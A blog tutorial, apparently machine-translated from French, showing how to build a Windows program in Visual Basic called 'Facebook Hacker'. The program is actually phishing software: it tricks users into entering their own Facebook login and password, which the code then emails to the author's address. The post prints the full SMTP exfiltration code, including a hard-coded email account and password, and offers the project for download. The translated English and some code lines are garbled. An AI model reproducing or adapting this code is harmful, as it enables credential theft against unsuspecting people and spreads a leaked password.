How to Create Fake Software for Hack Facebook Account

How to Create Fake Software for Hack Facebook Account

How to hack a Facebook account? This is one of the question that you pause you always, so today we will hack a hacker trying to hack a Facebook account actually let's do the opposite. In this tutorial I show you how to create a Facebook with Visual Basic 2010 hack account software. 

Software that we will create is a phishing software is to say that retrieves information enter and we mail to our email address. the principle is to give this software a person telling him that pirated software the Fb account, and there when they're going to use and saw Force entered its own login information. When he's going to give the order you will receive the news enter your e-mail.

créer un faux logiciel de hack
Download Facebook hacker
 Créer un logiciel de hack compte facebook

The hack fb account program runs under Windows and if you have any problem opening reassure install you to have the Microsoft .NET Framework 4.5 in your computer. I appoint under the name of FACEBOOK HACKER

How does Facebook Hacker?

For communication between the software and the courier we use the setting SMTP messaging to the choice and attribute features. When the so-called hacker going to enter its information into the first two boxes, shook it considered the body of the message, the subject of the message is already set in the source code.

In the source also he y' the contact details such as: an email address and a password to allow the automatic connection of the software to the SMTP server, an email message is received.

How to create Facebook Hacker?


faith graphics finish you will tackle the source code to avoid too make you think're you the code below

For not start again to Zero you can download the project and edit

Download the Vb.net project
 Facebook hacker compte visual basic
To change the project open Visual basic and click on import project, you can change all you want 


Source code hard ProgressBar and Timer


Private Sub Timer1_Tick(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Timer1.Tick
FacebookProgressBar1.Value = FacebookProgressBar1.Value + 1
If FacebookProgressBar1.Value = FacebookProgressBar1.Maximum Then
FacebookProgressBar1.Value = 0
Timer1.stop)
Timer1.enabled = False
FacebookTextBox1.Enabled = True
FacebookTextBox2.Enabled = True
End If
End Sub


Source code of the SMTP


Private Sub FacebookButton1_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles FacebookButton1.Click

If FacebookTextBox1.Text = "" Or FacebookTextBox2.Text = "" Or FacebookTextBox3.Text = "" Or FacebookTextBox5.Text = "" Then
MsgBox("Remplissez tous les champs", MsgBoxStyle.Information)
Else

Dim MyMailMessage As New MailMessage()
Dim SMTPServer As New SmtpClient("smtp.live.com")

' Email
MyMailMessage.From = New MailAddress ("kesolarhacker2@hotmail.com") ' recipient
MyMailMessage.To.Add ("kesolarhacker2@hotmail.com") ' sender
MyMailMessage.Subject = [("new account]") ' subject
MyMailMessage.Body = ("Login:" & FacebookTextBox1.Text & "Pass:" & FacebookTextBox2.Text) ' body
' SMTP
SMTPServer.Port = ("25")
SMTPServer.Credentials = New System.Net.NetworkCredential ("kesolarhacker2@hotmail.com", "Tuperdtontemps94") ' Email (+ Pass) replace it with your email and password
SMTPServer.EnableSsl = True

Try
SMTPServer.Send (MyMailMessage) ' send

Catch ex As Exception
End Try
Timer1.enabled = True
Timer1.start)
Timer1.interval = 1000 ' = 1 min
FacebookTextBox1.Enabled = False
FacebookTextBox2.Enabled = False
Process.Start ("Http://www.freetutosurf.com")

No comments

Powered by Blogger.